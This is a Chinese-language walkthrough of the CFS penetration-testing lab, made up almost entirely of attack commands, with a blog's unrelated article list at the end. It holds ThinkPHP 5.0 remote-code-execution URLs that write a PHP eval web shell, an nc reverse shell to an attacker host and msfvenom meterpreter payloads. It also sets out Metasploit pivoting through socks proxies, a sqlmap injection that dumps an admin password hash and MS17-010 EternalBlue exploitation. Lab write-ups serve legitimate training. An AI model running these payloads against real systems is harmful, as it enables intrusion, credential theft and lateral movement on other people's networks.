CFS靶机
nmap扫描
nmap -sV -p1-65535 192.168.1.135
thinkphp5.0版本
找到poc进行测试
http://192.168.1.135/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
http://192.168.1.135/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo "<?php @eval($_POST['cmd']);?>" > 1.php
写入成功
进行转义
http://192.168.1.135/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo "<?php @eval(\$_POST['cmd']);?>" >2.php
或者使用base64位编码
<?php @eval($_POST['cmd']);?>
转码位
PD9waHAgQGV2YWwoJF9QT1NUWyJjbWQiXSk7Pz4=
http://192.168.1.103/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo "PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4="| base64 -d > 3.php
反弹kali
nc 192.168.1.104 6666 -e /bin/bash
kali获取bash
python -c 'import pty;pty.spawn("/bin/bash")'
flag
msf生成木马
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.128 LPORT=1234 -f elf >1.elf
蚁剑上传
chmod 777 1.elf
./elf
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.1.128
msf5 exploit(multi/handler) > set lport 1234
msf5 exploit(multi/handler) > run
获取当前的网段
run get_local_subnets
添加理由
run autoroute -s 192.168.22.0/24
run autoroute -p
内网扫描
msf5 exploit(multi/handler) > use auxiliary/scanner/portscan/tcp
msf5 auxiliary(scanner/portscan/tcp) > set ports 22,389,80,21,3389
msf5 auxiliary(scanner/portscan/tcp) > set rhosts 192.168.22.0/24
msf5 auxiliary(scanner/portscan/tcp) > set lhost 192.168.1.128
设置socks4a代理
msf5 auxiliary(scanner/portscan/tcp) > use auxiliary/server/socks4a
msf5 auxiliary(server/socks4a) > set srvport 2222
srvport => 2222
msf5 auxiliary(server/socks4a) > run
[*] Auxiliary module running as background job 0.
[*] Starting the socks4a proxy server
msf5 auxiliary(server/socks4a) >
修改proxychains
vim /etc/proxychains.conf
socks4 192.168.1.128 2222
proxychains nmap -Pn -sT 192.168.22.129
-Pn:扫描主机检测其是否受到数据包过滤软件或防火墙的保护。
-sT:扫描TCP数据包已建立的连接connect
代理打开80网站
proxychains dirb http://192.168.22.129
注入
proxychains sqlmap -u “http://192.168.22.129/index.php?r=vul&keyword=1” -p keyword
proxychains sqlmap -u “http://192.168.22.129/index.php?r=vul&keyword=1” -p keyword --dbs
proxychains4 sqlmap -u “http://192.168.22.129/index.php?r=vul&keyword=1” -p keyword -D bagecms -T bage_admin –columns
proxychains sqlmap -u "http://192.168.22.129/index.php?r=vul&keyword=1" -p keyword -D bagecms -T bage_admin -C username,password –dump
admin | 46f94c8de14fb36680850768ff1b7f2a (123qwe)
登录后台
设置proxifier
msf生成木马
msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=432 -f elf > 5.elf
这次代理使用的bindtcp是Target2作为监听
proxychains msfconsole
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/bind_tcp
msf5 exploit(multi/handler) > set lhost 192.168.1.128
msf5 exploit(multi/handler) > set lport 432
msf5 exploit(multi/handler) > run
获取当前网段
run get_local_subnets
添加路由
run autoroute -s 192.168.33.0/24
run autoroute -p
msf5 auxiliary(scanner/portscan/tcp) > use auxiliary/server/socks4a
msf5 auxiliary(server/socks4a) > set srvport 2223
srvport => 2223
msf5 auxiliary(server/socks4a) > run
[*] Auxiliary module running as background job 2.
[*] Starting the socks4a proxy server
msf5 auxiliary(server/socks4a) >
修改proxychains
vim /etc/proxychains.conf
socks4 127.0.0.1 2223
探测33网段
use auxiliary/scanner/portscan/tcp
msf5 auxiliary(scanner/portscan/tcp) > set ports 22,389,80,21,3389
msf5 auxiliary(scanner/portscan/tcp) > set rhosts 192.168.22.0/24
msf5 auxiliary(scanner/portscan/tcp) > set lhost 192.168.1.128
端口扫描
proxychains nmap -Pn -sT 192.168.33.33
开放了445和3389端口
auxiliary/scanner/smb/smb_version
msf5 auxiliary(scanner/smb/smb_version) > use auxiliary/scanner/smb/smb_ms17_010
msf5 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.33.33
rhosts => 192.168.33.33
msf5 auxiliary(scanner/smb/smb_ms17_010) > run
msf5 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.33.33
rhost => 192.168.33.33
msf5 exploit(windows/smb/ms17_010_eternalblue) > run
msf5 exploit(windows/smb/ms17_010_eternalblue) > use exploit/windows/smb/ms17_010_psexec
msf5 exploit(windows/smb/ms17_010_psexec) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf5 exploit(windows/smb/ms17_010_psexec) > set RHOST 192.168.33.33
RHOST => 192.168.33.33
msf5 exploit(windows/smb/ms17_010_psexec) > run
65001 UTF-8代码页 解决乱码
chcp 65001
最新文章
- 修改/etc/profile和/etc/environment导致图形界面无法登陆的问题
- web应用动态文档技术
- SSH-keygen参数说明
- WPF 动态布局Grid
- [BZOJ4632]树的编码
- 图片放大插件——elevatezoom
- 当LinkButton无效时,光标不显示为手型
- iOS开发之iPhone通过get和post方式请求asp.net webservice
- javascript prototype __proto__区别
- Android程序检测网络是否可用
- 转 Linux下的GoldenGate的启动关闭Shell脚本(独立)
- ENVI_REGISTER_DOIT( )函数
- Spring MVC随笔记录
- 桥接模式和nat模式的区别
- AWT初步— 事件处理模型
- java中的强,软,弱,虚引用
- Error -26631: HTTP Status-Code=400 (Bad Request) for
- Webkit内核探究【1】——Webkit简介
- SIM900A基站定位调试笔记 -转
- 安装SharePoint Server的主机重命名